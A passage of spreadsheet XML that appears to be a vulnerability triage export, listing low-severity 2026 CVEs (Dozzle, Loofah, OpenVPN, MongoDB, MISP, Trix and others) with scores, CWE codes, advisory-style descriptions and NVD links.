          <t>Dozzle is a realtime log viewer for docker containers. From 10.5.2 until 10.6.15, the isBlockedIP SSRF guard in internal/notification/dispatcher/webhook.go, used by safeDialContext for webhook notification URLs, does not inspect IPv4 addresses embedded in 6to4, NAT64, Teredo, or IPv4-compatible IPv6 addresses, allowing an authenticated user to reach loopback or link-local targets that the guard intends to block. This issue is fixed in version 10.6.15.</t>
        </is>
      </c>
      <c r="M2254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t>
        </is>
      </c>
    </row>
    <row r="2255">
      <c r="A2255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73491</t>
        </is>
      </c>
      <c r="C2255" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D2255" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2255" s="5" t="inlineStr"/>
      <c r="F2255" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2255" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2255" s="5" t="inlineStr"/>
      <c r="I2255" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2255" s="5" t="inlineStr"/>
      <c r="K2255" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2255" s="5" t="inlineStr">
        <is>
          <t>Loofah is a general library for manipulating and transforming HTML/XML documents and fragments, built on top of Nokogiri. From 2.25.0 until 2.25.2, Loofah::HTML5::Scrub.allowed_uri? does not reject javascript: URIs whose scheme is split or prefixed with the HTML5 named whitespace character references &amp;Tab; or &amp;NewLine;. CGI.unescapeHTML leaves those references intact, so allowed_uri? reports the URL safe even though a browser decodes and strips the tab or line feed and executes the resulting javascript: URL. This issue affects only callers that pass HTML-encoded strings directly to allowed_uri?; Loofah's default sanitize() path is not affected. This issue is fixed in version 2.25.2.</t>
        </is>
      </c>
      <c r="M2255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73491</t>
        </is>
      </c>
    </row>
    <row r="2256">
      <c r="A2256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73492</t>
        </is>
      </c>
      <c r="C2256" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D2256" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2256" s="5" t="inlineStr"/>
      <c r="F2256" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2256" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2256" s="5" t="inlineStr"/>
      <c r="I2256" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2256" s="5" t="inlineStr"/>
      <c r="K2256" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="L2256" s="5" t="inlineStr">
        <is>
          <t>Loofah is a general library for manipulating and transforming HTML/XML documents and fragments, built on top of Nokogiri. From 2.25.0 until 2.25.2, Loofah::HTML5::Scrub.allowed_uri? does not reject javascript: or vbscript: URIs whose scheme is split by semicolon-less numeric character references such as &amp;#58, &amp;#9, &amp;#10, or &amp;#13. CGI.unescapeHTML leaves these references encoded, so allowed_uri? reports the URL safe even though a browser decodes an encoded colon or strips encoded whitespace and executes the resulting URI scheme. This issue affects only callers that pass HTML-encoded strings directly to allowed_uri?; Loofah's default sanitize() path is not affected. This issue is fixed in version 2.25.2.</t>
        </is>
      </c>
      <c r="M2256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73492</t>
        </is>
      </c>
    </row>
    <row r="2257">
      <c r="A2257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81738</t>
        </is>
      </c>
      <c r="C2257" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D2257" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2257" s="5" t="inlineStr"/>
      <c r="F2257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2257" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2257" s="5" t="inlineStr"/>
      <c r="I2257" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2257" s="5" t="inlineStr"/>
      <c r="K2257" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="L2257" s="5" t="inlineStr">
        <is>
          <t>OpenVPN 2.5.0 through 2.7.6 on Windows using the tap-windows6 driver allows attackers to trigger an out-of-bounds write via crafted DOMAIN-SEARCH entries</t>
        </is>
      </c>
      <c r="M2257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81738</t>
        </is>
      </c>
    </row>
    <row r="2258">
      <c r="A2258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="C2258" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D2258" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2258" s="5" t="inlineStr"/>
      <c r="F2258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2258" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H2258" s="5" t="inlineStr"/>
      <c r="I2258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2258" s="5" t="inlineStr"/>
      <c r="K2258" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L2258" s="5" t="inlineStr">
        <is>
          <t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t>
        </is>
      </c>
      <c r="M2258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="2259">
      <c r="A2259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86441</t>
        </is>
      </c>
      <c r="C2259" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D2259" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2259" s="5" t="inlineStr"/>
      <c r="F2259" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2259" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2259" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I2259" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2259" s="5" t="inlineStr"/>
      <c r="K2259" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="L2259" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain inconsistent authorization checks across dashboard widgets that display organisation information.
Several organisation-related widgets did not honor Security.hide_organisation_index_from_users. As a result, authenticated users without the perm_sharing_group permission could enumerate organisations even though the normal organisation index was intentionally hidden from them.
The affected widgets included paths that:
  *  
returned organisation names and identifiers;
  *  
could expose additional organisation database fields through JSON export because unrestricted find('all') queries fetched full rows;
  *  
accepted limit=0 or negative values in a way that could effectively remove the result limit and return the entire organisation table.
A related organisation-contributor leaderboard also ignored the same visibility setting. Its handler counted Event.orgc_id across the entire event table and mapped those IDs to organisation names, revealing every organisation with events regardless of whether the caller could see any of those events. The fix withdraws this widget entirely for users who lack organisation-index visibility.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M2259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86441</t>
        </is>
      </c>
    </row>
    <row r="2260">
      <c r="A2260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58234</t>
        </is>
      </c>
      <c r="C2260" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="D2260" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2260" s="5" t="inlineStr"/>
      <c r="F2260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2260" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2260" s="5" t="inlineStr"/>
      <c r="I2260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2260" s="5" t="inlineStr"/>
      <c r="K2260" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L2260" s="5" t="inlineStr">
        <is>
          <t>SAP Process Integration (SOAP Adapter) allows a privileged user to send specially crafted requests containing deeply nested entity definitions, which under certain conditions could temporarily increase processor load and degrade system responsiveness. Successful exploitation results in low impact on availability with no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M2260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t>
        </is>
      </c>
    </row>
    <row r="2261">
      <c r="A2261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0292</t>
        </is>
      </c>
      <c r="C2261" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2261" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2261" s="5" t="inlineStr"/>
      <c r="F2261" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2261" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, palo alto</t>
        </is>
      </c>
      <c r="H2261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I2261" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2261" s="5" t="inlineStr"/>
      <c r="K2261" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2261" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability in the network driver of Palo Alto Networks Prisma® Access Agent on Windows enables a local administrator to bypass security inspection, subsequently allowing them to  inject and intercept arbitrary network traffic.
The Prisma Access Agent on Linux, macOS, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M2261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0292</t>
        </is>
      </c>
    </row>
    <row r="2262">
      <c r="A2262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15310</t>
        </is>
      </c>
      <c r="C2262" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2262" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2262" s="5" t="inlineStr"/>
      <c r="F2262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2262" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2262" s="5" t="inlineStr"/>
      <c r="I2262" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2262" s="5" t="inlineStr"/>
      <c r="K2262" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2262" s="5" t="inlineStr">
        <is>
          <t>When decompressing crafted zip files using the bzip/LZMA/Zstandard 
compressions, Python could use an attacker-controlled size to 
pre-allocate memory, possibly resulting in memory exhaustion.</t>
        </is>
      </c>
      <c r="M2262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15310</t>
        </is>
      </c>
    </row>
    <row r="2263">
      <c r="A2263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73427</t>
        </is>
      </c>
      <c r="C2263" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2263" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2263" s="5" t="inlineStr"/>
      <c r="F2263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2263" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2263" s="5" t="inlineStr"/>
      <c r="I2263" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2263" s="5" t="inlineStr"/>
      <c r="K2263" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2263" s="5" t="inlineStr">
        <is>
          <t>Trix is a what-you-see-is-what-you-get rich text editor for everyday writing. Prior to 2.1.18, Trix is vulnerable to cross-site scripting when a crafted application/x-trix-document JSON payload is dropped into an editor using the fallback Level0InputController, such as an embedded WebView without Input Events Level 2 support. The StringPiece.fromJSON method trusts href attributes from the JSON payload without sanitization, allowing a draggable element containing a javascript: URI to bypass DOMPurify sanitization and inject executable JavaScript into the DOM. Exploitation requires the victim to drag and drop attacker-controlled content, and server-side HTML sanitization can neutralize the payload on save. This issue is fixed in version 2.1.18.</t>
        </is>
      </c>
      <c r="M2263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73427</t>
        </is>
      </c>
    </row>
    <row r="2264">
      <c r="A2264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82865</t>
        </is>
      </c>
      <c r="C2264" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2264" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2264" s="5" t="inlineStr"/>
      <c r="F2264" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2264" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2264" s="5" t="inlineStr"/>
      <c r="I2264" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2264" s="5" t="inlineStr"/>
      <c r="K2264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2264" s="5" t="inlineStr">
        <is>
          <t>pdfme schemas before 5.5.10 contains a cross-site scripting vulnerability in the multiVariableText property panel that assigns unsanitized i18n label values to innerHTML. Attackers who control label overrides through options.labels can inject arbitrary JavaScript that executes when users open the Designer and select a multiVariableText field without variable placeholders.</t>
        </is>
      </c>
      <c r="M2264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82865</t>
        </is>
      </c>
    </row>
    <row r="2265">
      <c r="A2265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86228</t>
        </is>
      </c>
      <c r="C2265" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2265" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2265" s="5" t="inlineStr"/>
      <c r="F2265" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2265" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2265" s="5" t="inlineStr"/>
      <c r="I2265" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2265" s="5" t="inlineStr"/>
      <c r="K2265" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="L2265" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in JeecgBoot up to 3.9.3. This vulnerability affects the function exportXls of the file jeecg-boot/jeecg-boot-module/jeecg-boot-module-airag/src/main/java/org/jeecg/modules/airag/llm/controller/AiragModelController.java. Such manipulation of the argument credential leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 3.9.5 is able to resolve this issue. The name of the patch is a2be896f753936956ee6863b632b8e5a0231345c. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="M2265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86228</t>
        </is>
      </c>
    </row>
    <row r="2266">
      <c r="A2266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86264</t>
        </is>
      </c>
      <c r="C2266" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2266" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2266" s="5" t="inlineStr"/>
      <c r="F2266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2266" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2266" s="5" t="inlineStr"/>
      <c r="I2266" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2266" s="5" t="inlineStr"/>
      <c r="K2266" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L2266" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in sfturing ssm_pro up to 627f426331da8086ce8fff2017d65b1ddef384f8. Affected is an unknown function of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Endpoint. This manipulation of the argument hospitalName/officesName/doctorName causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M2266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86264</t>
        </is>
      </c>
    </row>
    <row r="2267">
      <c r="A2267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86512</t>
        </is>
      </c>
      <c r="C2267" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2267" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2267" s="5" t="inlineStr"/>
      <c r="F2267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2267" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2267" s="5" t="inlineStr"/>
      <c r="I2267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2267" s="5" t="inlineStr"/>
      <c r="K2267" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="L2267" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in java-json-tools json-patch up to 1.13. This affects the function CopyOperation.apply/MoveOperation.apply of the file src/main/java/com/github/fge/jsonpatch/CopyOperation.java of the component Copy Move Operations. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M2267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t>
        </is>
      </c>
    </row>
    <row r="2268">
      <c r="A2268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86517</t>
        </is>
      </c>
      <c r="C2268" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2268" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2268" s="5" t="inlineStr"/>
      <c r="F2268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2268" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H2268" s="5" t="inlineStr"/>
      <c r="I2268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2268" s="5" t="inlineStr"/>
      <c r="K2268" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L2268" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is the function mysqli_query of the file /pages/us_searchfrm.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M2268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t>
        </is>
      </c>
    </row>
    <row r="2269">
      <c r="A2269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86674</t>
        </is>
      </c>
      <c r="C2269" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D2269" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2269" s="5" t="inlineStr"/>
      <c r="F2269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2269" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H2269" s="5" t="inlineStr"/>
      <c r="I2269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2269" s="5" t="inlineStr"/>
      <c r="K2269" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L2269" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is the function session_start of the file login.php. The manipulation results in session fixiation. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M2269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t>
        </is>
      </c>
    </row>
    <row r="2270">
      <c r="A2270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48791</t>
        </is>
      </c>
      <c r="C2270" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D2270" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2270" s="5" t="inlineStr"/>
      <c r="F2270" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2270" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2270" s="5" t="inlineStr"/>
      <c r="I2270" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2270" s="5" t="inlineStr"/>
      <c r="K2270" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2270" s="5" t="inlineStr">
        <is>
          <t>sigstore-java is a sigstore java client for interacting with sigstore infrastructure. Version 2.0.0 erroneously removed verification of the integrated (Rekor entry) time) against the Fulcio certificate. Version 2.1.0 re-added this verification with enhancements that adhere to the Sigstore verification spec. The old sigstore-conformance test for this check was built incorrectly. This vulnerability impacts only users verifying bundles with `dev.sigstore:sigstore-java:2.0.0`. Older versions are not affected; it is fixed in `dev.sigstore:sigstore-java:2.1.0` A malicious actor may exploit this if they were able to access a users system and exfiltrate the temporary private key used during signing and then reuse an old fulcio certificate later without requiring direct access to the user's credentials. Users may protect themselves by re-verifying their artifacts using the newest sigstore-java or another current sigstore client. Transparency logs may also be audited for unauthorized signatures for a suspected reused identity.</t>
        </is>
      </c>
      <c r="M2270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48791</t>
        </is>
      </c>
    </row>
    <row r="2271">
      <c r="A2271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53759</t>
        </is>
      </c>
      <c r="C2271" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D2271" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2271" s="5" t="inlineStr"/>
      <c r="F2271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2271" s="5" t="inlineStr">
        <is>
          <t>docker, python</t>
        </is>
      </c>
      <c r="H2271" s="5" t="inlineStr"/>
      <c r="I2271" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2271" s="5" t="inlineStr"/>
      <c r="K2271" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="L2271" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations. Prior to version 4.2.0, db_sqlite.py created SQLite databases at predictable paths in the shared /tmp directory and followed attacker-created symbolic links at those paths. An attacker who controls a local monitoring account can create a symlink such as /tmp/linuxfabrik-monitoring-plugins-docker-stats.db and then trigger a sudo-authorized plugin, causing the root process to create or modify the symlink target. The primitive can overwrite arbitrary paths, cause denial of service, or manipulate an existing SQLite database through a crafted rollback journal or write-ahead log. The Monitoring Plugins integration also moved plugin caches through lib.db_sqlite.get_db_path() so they use the secured per-user directory. This issue is fixed in version 4.2.0.</t>
        </is>
      </c>
      <c r="M2271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53759</t>
        </is>
      </c>
    </row>
    <row r="2272">
      <c r="A2272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85643</t>
        </is>
      </c>
      <c r="C2272" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D2272" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2272" s="5" t="inlineStr"/>
      <c r="F2272" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2272" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H2272" s="5" t="inlineStr"/>
      <c r="I2272" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2272" s="5" t="inlineStr"/>
      <c r="K2272" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L2272" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Online Shopping System 1.0. Impacted is the function mysqli_query of the file admin/adduser.php. Executing a manipulation of the argument mobile can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M2272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85643</t>
        </is>
      </c>
    </row>
    <row r="2273">
      <c r="A2273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82312</t>
        </is>
      </c>
      <c r="C2273" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="D2273" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2273" s="5" t="inlineStr"/>
      <c r="F2273" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2273" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2273" s="5" t="inlineStr"/>
      <c r="I2273" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2273" s="5" t="inlineStr"/>
      <c r="K2273" s="5" t="inlineStr">
        <is>
          <t>CWE-412, CWE-732</t>
        </is>
      </c>
      <c r="L2273" s="5" t="inlineStr">
        <is>
          <t>OpenVPN 2.0.0 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows local authenticated users to cause a denial of service via a NULL DACL on named IPC objects</t>
        </is>
      </c>
      <c r="M2273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82312</t>
        </is>
      </c>
    </row>
    <row r="2274">
      <c r="A2274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0291</t>
        </is>
      </c>
